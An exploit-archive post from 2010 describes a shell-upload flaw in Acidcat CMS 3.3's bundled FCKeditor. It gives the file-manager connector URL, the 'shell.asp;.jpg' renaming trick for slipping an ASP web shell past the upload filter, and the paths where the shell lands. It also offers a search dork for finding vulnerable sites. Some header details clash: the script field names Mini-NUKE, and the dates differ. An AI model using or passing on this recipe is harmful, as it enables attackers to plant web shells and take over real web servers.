Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
# Published : 2010-11-22
# Author : Net.Edit0r
# Previous Title : PHPMotion FCKeditor File Upload Vulnerability
# Next Title : JCMS 2010 file download vulnerability

============================================================================== 
 
        [?] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
 
============================================================================== 
 
    [?] Title   :           [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
 
    [?] Script  :           [ Mini-NUKE v2.3  ] 
 
    [?] Language:           [ ASP ] 
 
    [?] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
 
    [?] Author  :           [ Net.Edit0r - black.hat.tm@gmail.com }
 
    [?] My Home :           [ ajaxtm.com and datacoders.org ] 
 
    [?] Date    :           [ 2010-11-23 ] 
  
    [?] Version :           [ 3.3.X and 3.2.x ]

    [?] Dork    :           [ "Powered by Acidcat CMS " ]

   
 
########################################################################### 
 
    
===[ Exploit ]=== 
 
 
  [?] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp 
 
  [?] asp renamed via the .asp;.jpg (shell.asp;.jpg)

===[ Upload To ]===

  [?] http://server/read_write/file/[Shell] 

  [?] http://server/public/File/[Shell]


Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1

     BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic  ~ keracker
                                  
 
###########################################################################